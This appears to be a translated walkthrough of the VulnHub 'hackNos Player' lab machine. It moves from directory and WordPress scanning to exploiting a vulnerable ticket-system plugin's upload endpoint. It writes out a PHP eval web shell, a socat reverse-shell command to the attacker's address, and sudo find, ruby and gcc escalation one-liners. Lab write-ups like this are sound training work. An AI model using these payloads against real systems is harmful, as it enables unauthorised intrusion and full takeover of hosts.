Target download addresshttps://www.vulnhub.com/entry/hacknos-player,459/
Network Configuration
The target machine may not be able to automatically assign IP, so if it cannot be scanned, you need to manually configure to obtain an IP address. Follow the operation in the link to allocate IP. https://blog.csdn.net/asstart/article/details/103433065?utm_source=app
Press e to enter this interface after booting. Modify the specified content to rw signie init = / bin / bash.
After completion, Ctrl + X enters the shell interface.
Then use the dhclient command to obtain the IP. Check the IP again. The IP
has appeared successfully at this time. , Just restart.
Early stage
Open discovery is the default page of apache
Port scan found 2 ports open, first try to blast 3306 port
A large number of error messages appeared during blasting. This error message indicated that mysql set the number of failed connections, which caused MySQL to unconditionally force us to prevent connections. It seems that mysql has no effect and can only try port 80.
Use dirsearch to scan directories
dirsearch.py -u "http://192.168.245.171/" -e * -r -R 3
I didn't find anything valuable. After trying various combinations of hackNos, player, and Rahul_Gehlaut to guess the directory, I didn't find a new directory. I was too bad. Another way of thinking, since the author only left port 80 valid, there must be something I neglected on port 80, as expected, the root directory of the website was found in the default page
Looking for it in the public, thousands of Baidu suddenly looked back but in the dim light ~.
Found wordpross
I used wpscan directly for a shuttle. My wpscan installation has always had problems. I used the docker version directly. Here, because docker is installed on my Tencent cloud, I directly mapped the target machine to the external network for scanning and I was too lazy to install it ~
docker run -it --rm wpscanteam/wpscan --url http://xx.xx.xx/g@web/
I found a vulnerable version of the plug-in during the scan.
Try to enumerate the users
docker run -it --rm wpscanteam/wpscan --url http://xx.xx.xx/g@web/ --enumerate u
Found a suspicious interface
http://192.168.245.171/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
Open the url and find the type password string hackNos @ 9012 !!, write it down first
Mid-term in-depth
We directly search for the plug-in vulnerability exp in wpvulndb
https://wpvulndb.com/search?text=WP Support Plus Responsive Ticket System
Choose a remote code to execute
It can be seen that the vulnerability is due to the simple matching of the blacklist suffix due to the use of switch case, which can be bypassed. Upload the executable file and
directly copy the exp copy to modify the submission address
<form method="post" enctype="multipart/form-data" action="http://192.168.245.170/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
We choose to upload php directly to the shell
<?php eval(@$_POST[1]);?>
Uploaded successfully
Find our shell in the upload directory, open and execute our command.
Here we use socat to bounce an interactive shell
Socat is a tool under Unix-like systems and can be seen as an enhanced version of nc. We can use socat to deliver a complete TCP connection with tty.
Control end: socat file:\tty`, raw, echo = 0 tcp-listen: 8888`
Open the shell to execute our command
1=system("socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.170:8888");
You can see that the control terminal in the lower right corner has successfully received the rebound shell
Later Elevation of Rights
Use sudo -l to view the sudo permissions and find that a password is required. Try to enter the password obtained before, to no avail
Switch to the home directory and find three usernames, try to use the password hackNos @ 9012 !! Log in one by one
Successfully login security user
Use sudo -l to find that you can execute the find command with hacknos-boat permission without password.Here
we directly use the gtfobins tool to find the payload that uses the binary file to execute the command
https://gtfobins.github.io/
The -exec parameter of the find command allows us to filter the files that were filtered out in the previous process, and use the command command to process them. We directly execute / bin / bash
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \;
At this time, the hackNos-boat user's permission was obtained. Check the sudo permission again and find that the hunter user can execute ruby. Then use the ruby -e parameter directly. -E means to execute the following string as a script.
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash/"'
After obtaining the hunter permission, we found that we can execute the gcc command with root permission, we directly go to gtfobins search
sudo -u root /usr/bin/gcc -wrapper /bin/bash,-s .
The root permission is successfully obtained. The -wrapper parameter does not find any meaning. If the master knows it, you can tell it.
At the end, I haven't done the target machine infiltration for a while, and found that many things have been forgotten, write an article to record and prevent forgetting. Come on ~